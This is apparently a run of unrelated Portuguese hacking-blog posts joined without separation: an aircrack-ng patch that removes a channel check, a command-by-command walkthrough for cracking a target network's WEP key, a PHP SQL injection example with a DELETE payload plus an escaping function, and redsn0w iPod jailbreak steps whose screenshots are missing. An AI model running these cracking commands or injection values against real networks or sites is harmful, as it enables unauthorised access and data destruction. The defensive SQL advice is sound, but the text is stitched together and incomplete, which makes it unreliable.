airodump-ng: Fixed channel to -1 = fixed channel mon0: -1 
aireplay-ng: Wouldn’t false authenticate OR deauth = mon0 is on channel -1, but the AP uses channel XXX

Pesquisando na web, maioria dos sites indicam recompilar o kernel com um patch para resolver o problema.

Mas não e necessário recompilar o kernel!

Você sim vai precisar recompilar o pacote aircrack-ng, mas se utiliza Debian ou Ubuntu, a tarefa e bem simples.

(Solucao baseada no patch descrito em: http://trac.aircrack-ng.org/ticket/742).

Crie um diretório temporario e baixe o fonte do aircrack-ng:

mkdir tmp
cd tmp
apt-get source aircrack-ng

Edite o arquivo src/aireplay-ng.c:

cd aircrack-ng-1.1
cd src
nano aireplay-ng.c

Remova o seguinte código (por volta da linha 726):

        if(ap_chan != iface_chan)
        {
            PCT; printf("%s is on channel %d, but the AP uses channel %d\n", wi_get_ifname(wi), iface_chan, ap_chan);
            return -1;
        }

Salve o arquivo.

Va para o diretorio onde foi extraido o codigo fonte (aircrack-ng-1.1):

cd ..

Recompile o .deb:

dpkg-buildpackage

Se tudo deu certo, voce vera a mensagem:

dpkg-deb: building package `aircrack-ng' in `../aircrack-ng_1.1-1.1_amd64.deb'.
 dpkg-genchanges  >../aircrack-ng_1.1-1.1_amd64.changes
dpkg-genchanges: not including original source code in upload
 dpkg-source --after-build aircrack-ng-1.1
dpkg-buildpackage: binary and diff upload (original source NOT included)

Basta instalar o novo pacote com o comando:

dpkg -i ../aircrack-ng_1.1-1.1_amd64.deb

Video demonstrativo de como quebrar uma chave WEP (nesse caso 40-bits, mas funcionaria para 104-bits).

Comandos:
0:42 apt-get install aircrack-ng
1:06 iwconfig
1:22 airmon-ng start wlan0
1:30 ifconfig
1:35 ifconfig mon0
1:43 airodump-ng mon0
2:05 airodump-ng –channel 6 –bssid XX:XX:XX:XX:XX:XX -w wep1 mon0
2:33 sudo su
2:43 ifconfig wlan0
2:50 aireplay-ng -1 0 -e YYYY -a XX:XX:XX:XX:XX:XX -h ZZ:ZZ:ZZ:ZZ:ZZ:ZZ mon0
3:17 aireplay-ng -3 -b XX:XX:XX:XX:XX:XX -h ZZ:ZZ:ZZ:ZZ:ZZ:ZZ mon0
4:04 sudo su
4:13 aireplay-ng -1 0 -e YYYY -a XX:XX:XX:XX:XX:XX -h ZZ:ZZ:ZZ:ZZ:ZZ:ZZ mon0
4:26 ls -lah wep1-01.cap
4:35 aircrack-ng -b XX:XX:XX:XX:XX:XX wep1-01.cap

XX:XX:XX:XX:XX:XX = BSSID da rede alvo (obtido pelo airodump-ng)
YYYY = nome da rede alvo (obtido pelo airodump-ng)
ZZ:ZZ:ZZ:ZZ:ZZ:ZZ:ZZ = MAC address da interface de rede que usamos para injetar os pacotes (nesse caso: wlan0)

UPDATE (23/10/2011):

aireplay-ng: Wouldn’t false authenticate OR deauth = mon0 is on channel -1, but the AP uses channel X

Se voce estiver tendo problema com “channel -1″, de uma olhada nesse tutorial:

http://www.hack.net.br/blog/hacking/aircrack-ng-mon0-is-on-channel-1-but-the-ap-uses-channel-x/

Por exemplo, uma simples consulta aos produtos de um comércio eleterônico pode ser feita da seguinte forma:

$sql = “SELECT * FROM produtos WHERE id_produto = ‘{$_GET['id']}’;”;

Quando o visitante for acessar o endereço “produto.php?id=123″, o SQL gerado será “SELECT * FROM produtos WHERE id_produto = ’123′;”, e o resultado esperado será obtido.

Contudo, se o visitante estiver mal intencionado, ele poderá alterar o endereço no seu navegador para “produto.php?id=123′;DELETE FROM clientes WHERE ’0′=’0″, e o SQL gerado será “SELECT * FROM produtos WHERE id_produto = ’123′;DELETE FROM clientes WHERE ’0′=’0′;”, o que será interfretado pelo canco de dados como 2 comandos diferentes: Um SELECT previsto, e um DELETE que não poderia ser realizado.

Para evitar este problema, é importante utilizar funções de tratamento de string. Cada banco de dados possui a sua própria função. A seguir, segue uma função que faz os devidos tratamentos para cada tipo de variável (descomente o retorno adequado para o seu banco de dados):

function sql($valor){

if(is_bool($valor))

return $valor?”TRUE”:”FALSE”;

else if(is_numeric($valor))

return $valor;

else if(empty($valor)||is_null($valor))

return “NULL”;

if(get_magic_quotes_gpc())

$valor = stripslashes($valor);

// MySQL

//return “‘”.mysql_real_escape_string($valor).”‘”;

// PgSQL

//return “‘”.pg_escape_string($valor).”‘”;

// SQLite

//return “‘”.sqlite_escape_string($valor).”‘”;

}

Com esta função, basta reescrever o seu código da seguinte forma:

$sql = “SELECT * FROM produtos WHERE id_produto = “.sql($_GET['id']).”;”;

Baixe o crack em http://redsn0w.com/

Você vai precisar de um programa de Torrent para baixar, eu recomendo o uTorrent.

Ao executar o arquivo redsn0w.exe, primeira coisa que noto é que ele fechou o iTunes automaticamente, e pediu para que conectasse meu iPod Touch em modo DFU. Portanto acho interessante executar o redsn0w antes de conectar o iPod, caso contrário o iTunes irá tentar sincronizar.

Colocando em DFU:

Com o redsn0w.exe sendo executado, conecte o iPod Touch ao computador.

Segure o botão de desligar e Home até que a tela fique preta e o iPod desligue.

Assim que o iPod desligar (apagar a tela), conte 2 segundos e solte o botão de desligar (acima) e mantenha pressionado o Home por mais 10 segundos. Se tudo der certo, o iPod continuará com a tela preta e o redsn0w vai comecar sozinho.

Nesse momento o redsn0w já irá começar automaticamente a realizar o desbloqueio, conforme mostrado abaixo:

Enquanto isso, a tela do iPod Touch deve mostrar:

Em seguida:

Após o boot, o seu iPod está pronto para instalar outros softwares.